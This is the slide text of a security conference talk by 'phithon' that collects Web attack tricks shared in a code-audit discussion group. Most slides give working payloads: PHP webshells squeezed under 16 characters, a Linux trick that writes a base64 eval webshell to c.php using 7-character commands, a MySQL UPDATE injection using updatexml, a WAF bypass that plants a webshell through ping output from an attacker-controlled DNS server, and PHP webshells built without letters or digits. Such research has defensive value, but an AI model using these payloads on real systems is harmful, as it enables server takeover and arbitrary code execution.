Some Tricks From My Secret Group

by phithon

Slide 1

Slide 1 text

Slide 2

Slide 2 text

About PHITHON 习主席最关心的人 ▪ 困难群众 ▪ 安全研究者 ▪ 程序猿 ▪ 猫奴 ▪ Come From @chaitin 博客: https://www.leavesongs.com 微博: @phithon_xg GITHUB: @phith0n

Slide 3

Slide 3 text

来自小密圈里的那些奇技淫巧《代码审计》小密圈：一个分享与交流猥琐Web安全技巧的小圈子。时间轴 ❖ 2016.11.14 圈子创建 ❖ 2016.11.15 用户破百 ❖ 2016.12.01 更多安全相关小圈子形成 ❖ 2017.01.09 微信小程序发布，小密圈尝鲜 ❖ 2017.02.10 用户破四百 ❖ 2017.02.16 主题数量：146篇 ❖ 2017.02.18 《来自小密圈里的那些奇技淫巧》降躁 / 消除偏见 / 纯技术交流 / 思路分享 / 理性面对漏洞 / 赚点小钱

Slide 4

Slide 4 text

1 EVAL Length Restrict Bypass Trick

Slide 5

Slide 5 text

How to Execute PHP Webshell Within 16 Characters

Slide 6

Slide 6 text

EVAL Length Restrict Bypass Trick

Slide 7

Slide 7 text

`$_GET[1]` ➔ Length: 10 ➔ Difficulty: Easy ➔ Exploit Requirement: High ➔ Score: 0 another answer: exec($_GET[1]);

Slide 8

Slide 8 text

include$_GET[1]; ➔ Length: 16 ➔ Difficulty: Hard ➔ Exploit Requirement: Low ➔ Score: 40 phpinfo(); ⇒ $_FILES[file][tmp_name] ⇒ include Reference: https://goo.gl/Djgzvg

Slide 9

Slide 9 text

Not Beautiful? score < 50 === poor exploit

Slide 10

Slide 10 text

foo.php?1=file_put_contents¶m=$_GET[1](N,P,8); foo.php?1=file_put_contents¶m=$_GET[1](N,D,8); ... foo.php?1=file_put_contents¶m=$_GET[1](N,w,8); /* put 'PD9waHAgZXZhbCgkX1BPU1RbOV0pOw' into file 'N' */ foo.php?param=include$_GET[1];&1=php://filter/read=convert.b ase64-decode/resource=N ➔ Length: 16 ➔ Difficulty: Moderate ➔ Exploit Requirement: Low ➔ Score: 80

Slide 11

Slide 11 text

usort(...$_GET); foo.php?1[]=test&1[]=phpinfo();&2=assert ➔ Length: 16 ➔ Difficulty: Easy ➔ Exploit Requirement: High ➔ Score: 100 PHP5.6 variable-length argument lists ⇒ usort callback backdoor ⇒ arbitrary code execution

Slide 12

Slide 12 text

" such a beautiful exploit, it's almost like art "

Slide 13

Slide 13 text

2 Linux Command Length Restrict Bypass Trick

Slide 14

Slide 14 text

How to Execute Arbitrary Command Within 7 Characters

Slide 15

Slide 15 text

Linux Command Length Restrict Bypass Trick The question comes from a binary vulnerability exploiting. In the vulnerability, we can control a 8 bytes string, but it must be end with "\0". I write a simple example code using PHP.

Slide 16

Slide 16 text

How To Put An Elephant Into A Refrigerator Put the Elephant Close the Door Open the Door

Slide 17

Slide 17 text

How To Bypass Linux Command Length Restrict? `sh 0` ⇒ Length:4 Get Shell `.. > 0` ⇒ Length?

Slide 18

Slide 18 text

How To Bypass Linux Command Length Restrict? `sh 0` ⇒ Length:4 Get Shell `.. > 0` ⇒ Length? Difficulty

Slide 19

Slide 19 text

Linux Command Length Restrict Bypass Trick A asesome trick from @超威蓝猫. www:~$ w>hp www:~$ w>c.p\\ www:~$ w>d\>\\ www:~$ w>\ -\\ www:~$ w>e64\\ www:~$ w>bas\\ www:~$ w>7\|\\ www:~$ w>XSk\\ ... www:~$ w>PD9\\ www:~$ w>o\ \\ www:~$ w>ech\\ www:~$ ls -t>0 www:~$ sh 0

Slide 20

Slide 20 text

Linux Command Length Restrict Bypass Trick www:~$ ls -t ech\ o \ PD9\ waH\ AgZ\ XZh\ bCg\ kX0\ dFV\ Fsx\ XSk\ 7|\ bas\ e64\ -\ d>\ c.p\ hp www:~$ echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d> c.php ▪ w The shortest command in Linux ▪ ls -t List directory sort by time modified ▪ A [\n] between every two filename ▪ [\] Quote the [\n] after filename ▪ So [\n] don't influence command execution ▪ Arbitrary command execution vulnerability

Slide 21

Slide 21 text

➔ Length: 7 ➔ Difficulty: Easy ➔ Exploit Requirement: Low ➔ Score: 100

Slide 22

Slide 22 text

Slide 23

Slide 23 text

3 Mysql SQLi Without Comments Trick

Slide 24

Slide 24 text

How To Exploit SQL Injection After "Update `table`" Within A Multiple Lines Environment?

Slide 25

Slide 25 text

Mysql SQLi Without Comments SQL Injection occurs at position `$table`, but we can not comment out the rest SQL statement (because of line feed).

Slide 26

Slide 26 text

Review the Basis “基础不牢，地动山摇”

Slide 27

Slide 27 text

Mysql "comments" Syntax ▪ [#] One line comments ▪ [-- ] One line comments, double dash with a whitespace ▪ [/*...*/] Multiple lines comments ▪ [`] At some condition, ` is similar with comments ▫ Mysql @@version <= 5.5 ▫ Reference: https://goo.gl/633Ej7 ▪ [;] When multiple SQL statements execution support ▫ PDO ✔ ▫ Mysql ✘ ▫ Mysqli ✘

Slide 28

Slide 28 text

Mysql Update Syntax Update syntax: https://goo.gl/LkSDVa UPDATE [LOW_PRIORITY] [IGNORE] table_reference SET col_name1={expr1|DEFAULT} [, col_name2={expr2|DEFAULT}] ... [WHERE where_condition] [ORDER BY ...] [LIMIT row_count] Which statements can be put in position "table_reference"?

Slide 29

Slide 29 text

Mysql Update Syntax table_reference: static table name or dynamic table name from join statements Join syntax: https://goo.gl/lvIf7E ... table_reference [INNER | CROSS] JOIN table_factor [join_condition] | table_reference STRAIGHT_JOIN table_factor | table_reference STRAIGHT_JOIN table_factor ON conditional_expr | table_reference {LEFT|RIGHT} [OUTER] JOIN table_reference join_condition | table_reference NATURAL [{LEFT|RIGHT} [OUTER]] JOIN table_factor

Slide 30

Slide 30 text

UPDATE `user` JOIN (SELECT updatexml(0,concat(0xa,version()),0) )a#` SET username='admin' WHERE id=1; ➔ Difficulty: Easy ➔ Exploit Requirement: Low ➔ Score: 70

Slide 31

Slide 31 text

Document's Importance

Slide 32

Slide 32 text

4 Command Execution WAF Bypass Trick

Slide 33

Slide 33 text

How To Write Webshell Via Command Ping?

Slide 34

Slide 34 text

Command Execution WAF Bypass Trick ', '>', $ip); echo shell_exec('ping -c1 ' . $ip);

Slide 35

Slide 35 text

Three Difficulty Steps Control Ping's Result The Influence Of Local DNS stripos($ip, '.php')

Slide 36

Slide 36 text

Bash && escapeshellcmd character www:~$ una""me -a Linux vultr.guest 4.9.6-040906-generic #201701260330 SMP Thu Jan 26 08:32:10 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux ▪ escapeshellcmd (https://goo.gl/Ln0mXi) ▫ Escape &#;`|*?~<>^()[]{}$\x5C\x0A\xFF ▫ Don't escape " ' if they are paired ▪ In bash, "" means the empty string ▫ .p""hp ⇒ .php ⇒ waf bypass!

Slide 37

Slide 37 text

Three Difficulty Steps Control Ping's Result The Influence Of Local DNS stripos($ip, '.php')

Slide 38

Slide 38 text

Ping's Research www:~$ ping -c1 www.leavesongs.com PING leavesongs.com (107.191.60.143) 56(84) bytes of data. 64 bytes from 107.191.60.143.vultr.com (107.191.60.143): icmp_seq=1 ttl=64 time=0.033 ms --- leavesongs.com ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.033/0.033/0.033/0.000 ms ▪ We can control ping's result via CNAME record! ▪ Idea: Set the CNAME record of my domain name to a webshell

Slide 39

Slide 39 text

Deploy Evil Dns Server Object: Deploy dns server myself && return webshell Reason: DNSPOD (or ..) don't allow special characters tool: dnslib.py request = DNSRecord.parse(data) reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q) qname = request.q.qname if qn.startswith('aaa.dddns.leavesongs.com'): rdata = CNAME('.dddns.leavesongs.com') reply.add_answer(RR(rname=qname, rtype=5, rclass=1, ttl=300, rdata=rdata)) else: rdata = A('107.191.60.143') reply.add_answer(RR(rname=qname, rtype=1, rclass=1, ttl=300, rdata=rdata))

Slide 40

Slide 40 text

Ping's Research www:~$ ping -c1 aaa.dddns.leavesongs.com PING .dddns.leavesongs.com (107.191.60.143): 56 data bytes 64 bytes from 107.191.60.143: icmp_seq=0 ttl=50 time=101.293 ms --- .dddns.leavesongs.com ping statistics --- 1 packets transmitted, 1 packets received, 0.0% packet loss round-trip min/avg/max/stddev = 101.293/101.293/101.293/0.000 ms dddns.leavesongs.com ⇒ NS Record ⇒ My DNS Server aaa.dddns.leavesongs.com ⇒ .dddns.leavesongs.com ⇒ 107.191.60.143

Slide 41

Slide 41 text

Three Difficulty Steps Control Ping's Result The Influence Of Local DNS stripos($ip, '.php')

Slide 42

Slide 42 text

Ping's Research www:~$ nslookup aaa.dddns.leavesongs.com Server: 8.8.8.8 Address: 8.8.8.8#53 Non-authoritative answer: aaa.dddns.leavesongs.com canonical name = .dddns.leavesongs.com. Name: .dddns.leavesongs.com Address: 107.191.60.143 www:~$ ping -c1 aaa.dddns.leavesongs.com ping: unknown host aaa.dddns.leavesongs.com WHAT THE F**K ?

Slide 43

Slide 43 text

The Influence Of Local DNS NSLOOKUP DIG PING 8.8.8.8 ✔ ✔ ✘ 119.29.29.29 ✔ ✔ ✔ 223.5.5.5 ✘ ✘ ✘

Slide 44

Slide 44 text

难点突破 Control Ping's Result The Influence Of Local DNS stripos($ip, '.php')

Slide 45

Slide 45 text

`ping yourdomain.com > 1.ph""p` ➔ Difficulty: Hard ➔ Exploit Requirement: High ➔ Score: 90

Slide 46

Slide 46 text

5 PHP Webshell Without Alpha And Number Trick

Slide 47

Slide 47 text

How To Create A PHP Webshell Without Alpha And Number?

Slide 48

Slide 48 text

PHP Webshell Without Alpha And Number Trick The question comes from someday's fantasy

Slide 49

Slide 49 text

PHP Webshell Without Alpha And Number Trick Three Step ▪ Get numbers ▪ Get alphas (important) ▪ Execute code

Slide 50

Slide 50 text

PHP Webshell Without Alpha And Number Trick Get numbers ▪ PHP Type Juggling ⇔ TRUE == 1 ⇔ FALSE == 0 ⇔ TRUE + TRUE == 2 Get alphas ▪ XOR '!'^'`' == 'A' ▪ NOT ~('和'{2}) == 's' ▪ Others ? Execute code ▪ PHP Code Execution ⇔ $f='assert';$f(...); ⇔ Restrict in PHP 7

Slide 51

Slide 51 text

'!'^'`' == 'A' Using XOR to Get Alpha ➔ Complex rate: Low ➔ Difficulty: Easy ➔ Exploit Requirement: Low ➔ Score: 40

Slide 52

Slide 52 text

~('和'{2}) == 's' Using NOT to Get Alpha ➔ Complex rate: High ➔ Difficulty: Easy ➔ Exploit Requirement: Low ➔ Score: 50

Slide 53

Slide 53 text

Not Beautiful? How to solve the question without bit operation?

Slide 54

Slide 54 text

PHP Increment Operation ▪ $i++ ▪ PHP increment operation == C + Perl ▫ 'a'++ ⇒ 'b'; 'b'++ ⇒ 'c'; 'c'++ ⇒ 'd'; ... ▫ Only digits([a-zA-Z0-9]) are supported ▫ 'z'++ ⇒ 'aa'; ▪ Thinking about: If Increment Operation would help me to solve the problem?

Slide 55

Slide 55 text

PHP Webshell Without Alpha And Number Trick ▪ If Increment Operation would help me to solve the problem? ▫ Got 'A' ⇒ Got 'B' ⇒ ... ⇒ Got 'Z' ▪ How to get 'A'? ▫ PHP5.3- Array ⇔ PHP5.3+ [] ▫ ''.[] == 'Array' ▫ 'Array'{0} === 'A' ▫ 'Array'{3} === 'a' ▫ '' == 0 ▫ $_=''.[]; $_{''}==='A';

Slide 56

Slide 56 text

$_=''.[]; $_{''}==='A'; Using Array+Increment to get alpha ➔ Complex rate: Medium ➔ Difficulty: Moderate ➔ Exploit Requirement: Low ➔ Score: 80

Slide 57

Slide 57 text

A PHP Type Juggling Game

Slide 58

Slide 58 text

Tricks Structure Brainstor m Experienc e Fuzz

Slide 59

Slide 59 text

CREDITS 上述灵感来自那些一直支持《代码审计》小密圈的小伙伴们 ▪ @超威蓝猫 ▪ @AAA ▪ @Tomato ▪ @雨了个雨 ▪ @他，是鹿 ▪ @wd0g ▪ @L3m0n ▪ @栋栋的栋 ▪ @roker ▪ @xfkxfk ▪ @乐清小俊杰 ▪ @Joseph ▪ @Melody ▪ @聂心明 ▪ @索马里的海贼 ▪ @mLT ▪ @HackBraid ▪ @mm519 ▪ @fyth ▪ @所有圈子里的童鞋

Slide 60

Slide 60 text

Thanks! ANY QUESTIONS? You can find me at: Twitter: @phithon_xg https://www.leavesongs.com